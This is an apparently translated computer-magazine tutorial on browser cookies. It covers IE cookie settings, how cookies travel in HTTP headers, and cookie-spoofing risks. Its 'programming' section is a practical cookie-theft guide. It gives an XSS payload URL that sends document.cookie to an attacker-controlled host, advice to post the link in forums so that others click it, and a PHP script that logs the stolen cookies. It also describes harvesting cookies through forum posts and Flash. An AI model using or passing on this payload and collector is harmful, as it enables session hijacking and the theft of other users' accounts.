Cookie means small dessert in English, and we can always see this word in the browser. How can food be related to the browser? When you browse a website you have logged in before, you may see the following message on the web page: Hello XX, it feels very friendly, just like eating a small dessert. This is actually achieved by accessing a file in your host, so this file is also called a cookie. Want to know all about cookies? Take a look below!
1. Understand Cookie Applicable objects: Beginner readers
Cookie is a small text file that the website stores on your machine when you browse a website. It records your user ID, password, web pages browsed, time spent and other information. , when you come to the website again, the website learns your relevant information by reading the cookie, and can take corresponding actions, such as displaying a slogan welcoming you on the page, or allowing you to browse directly without entering your ID or password. Log in and more. You can view all cookies saved to your computer by selecting "Settings/View Files" in the "General" tab of "Tools/Internet Options" in IE. These files are usually named in the format user@domain , where user is your local username and domain is the domain name of the website you are visiting. If you use the NetsCape browser, it is stored in "C:PROGRAMFILESNETSCAPEUSERS". Different from IE, NETSCAPE uses a Cookie file to record the cookies of all websites.
In order to ensure Internet security we need to set cookies appropriately. Open the "Privacy" tab in "Tools/Internet Options" (note that this setting only exists in IE6.0, other versions of IE can click "Custom Level" in the "Security" tab of "Tools/Internet Options" button to make simple adjustments) to adjust the security level of cookies. Normally, you can adjust the slider to the "medium-high" or "high" position. Most forum sites require the use of cookie information. If you never go to these places, you can adjust the security level to "Block All Cookies". If you just want to block cookies from individual websites, you can click the "Edit" button to add the websites you want to block to the list. In the "Advanced" button option, you can set first-party cookies and third-party cookies. First-party cookies are cookies from the website you are browsing, and third-party cookies are not cookies sent to you by the website you are browsing. Usually you have to choose "Reject" for third-party cookies, as shown in Figure 1. If you need to save cookies, you can use IE's "Import and Export" function, open "File/Import and Export", and follow the prompts.
Most of the content in the cookie is encrypted, so it seems to us that it is just a meaningless combination of letters and numbers. Only the server's CGI handler knows their true meaning. We can view more content through some software. The cookie information viewed using Cookie Pal software is shown in Figure 2. It provides us with the contents of Server, Expires, Name, Value and other options. Among them, Server is the website that stores cookies, Expires records the time and lifetime of the cookie, and the Name and value fields are specific data (this newspaper has a detailed introduction to this software in Issue 10, Page 42).
Download address: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Cookie delivery process Applicable objects: Intermediate readers When they type the URL of a Web site in the browser address bar, the browser will send a request to read the web page to the Web site and display the result on the monitor. At this time, the webpage looks for the Cookie file set by the Amazon website on your computer. If it is found, the browser will send the data in the Cookie file together with the previously entered URL to the Amazon server. When the server receives the cookie data, it will retrieve your ID, your shopping records, personal preferences and other information in its database, record the new content, and add it to the database and cookie files. If no cookie is detected or your cookie information does not match the information in the database, it means that you are browsing the website for the first time, and the server's CGI program will create new ID information for you and save it in the database.
Cookies are transferred using the HTTP header information in the web page code. Cookies can be transferred with every web page request made by the browser, for example, when the browser opens or refreshes the web page. The server adds the cookie to the HTTP header information of the web page, and transmits the web page data back to your browser. The browser will choose whether to save this data based on the cookie settings on your computer. If the browser does not allow cookies to be saved, the data will disappear after closing the browser. The time that cookies are stored on your computer is different, which is determined by the server settings. Cookies have an Expires (validity period) attribute, which determines the cookie storage time. The server can change the cookie storage time by setting the value of the Expires field. If this attribute is not set, the cookies are only valid while browsing the web. If you close the browser, these cookies will disappear automatically. This is the case for most websites. Normally, a cookie contains the fields Server, Expires, Name, and Value. Only the Name and Value fields are useful to the server. The contents of the Expires and other fields are just to tell the browser how to process these Cookies.
3. Cookie programming implementation Applicable objects: Advanced readers Most web programming languages provide support for Cookies. Such as JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, etc. In these object-oriented programming languages, the programming utilization of Cookie is basically similar. The general process is: first create a Cookie object (Object), and then use the control function to assign, read, write and other operations to the Cookie. So how to obtain sensitive information in other users' cookies through code? A brief introduction follows.
This method has two main steps. First, locate the website you need to collect cookies, analyze it, and construct the URL; then compile the PHP code to collect cookies and put it on a website you can control, without knowing it. The PHP code can be executed after the user clicks the URL you constructed. Let’s look at the specific implementation process below.
1. Analyze and construct the URL.
First open the website where we want to collect cookies. Here we assume it is http://www.XXX.net . Log in to the website and enter the user name "<A1>" (without quotation marks) to analyze the data and capture the packets. , get a code in the form of "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6", replace "<A1>" Try again for "<script>alert(document.cookie)</script>"; if the execution is successful, start constructing the URL: "http://www.XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6 ". Among them, http:///www.cbifamily.org/cbi.php is a script on a certain host that you can control. It should be noted that "%2B" is the URL encoding of the symbol "+", because "+" will be treated as a space. The URL can be posted in the forum to induce others to click on it.
2. Prepare PHP script.
The function of this script is to collect Cookie files. The specific content is as follows:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("Location: http://www.downcodes.com ");
?>
4. Cookie security issues Applicable objects: All readers who want to be safe online
1. Cookie deception
Cookies record information such as user account IDs and passwords. If transmitted online, MD5 encryption is usually used. Even if the encrypted information is intercepted by some people with ulterior motives on the Internet, they will not be able to understand it because all they see are meaningless letters and numbers. However, the problem now is that people who intercept cookies do not need to know the meaning of these strings. They only need to submit other people's cookies to the server and if they can pass the verification, they can pretend to be the victim's identity and log in to the website. This method is called cookie spoofing. The prerequisite for cookie spoofing is that there is a vulnerability in the server's verification program, and the impostor wants to obtain the cookie information of the person being impersonated. It is very difficult for the current website verification program to exclude all illegal logins. For example, the language used to write the verification program may have loopholes. Moreover, it is very easy to obtain other people's cookies. You can achieve this by writing a small piece of code in a language that supports cookies (see details in method 3). As long as this code is placed on the network, everyone's cookies can be collected. If a forum allows HTML code or allows the use of Flash tags, you can use these technologies to collect Cookie code and put it in the forum, then give the post an attractive topic and write interesting content, and you can quickly collect a large number of Cookies . On the forum, many people's passwords were stolen by this method. As for how to prevent it, there is currently no specific cure. We can only use the usual protection methods. Do not use important passwords in forums, do not use the IE function to automatically save passwords, and try not to log in to websites where you do not know the details.
2. Flash code hidden dangers
There is a getURL() function in Flash. Flash can use this function to automatically open a specified web page. Therefore it may lead you to a website containing malicious code. For example, when you are enjoying a beautiful Flash animation on your computer, the code in the animation frame may have been quietly connected to the Internet and opened a very small page containing special code. This page can collect your cookies and do other things, such as planting Trojans on your machine or even formatting your hard drive, etc. Websites cannot prohibit this behavior of Flash because it is the internal behavior of Flash files. What we can do is to try to open the firewall if you are browsing locally. If the firewall prompts you to not know the data packets sent out, it is best to ban them. If you want to enjoy it on the Internet, it is best to find some well-known large websites.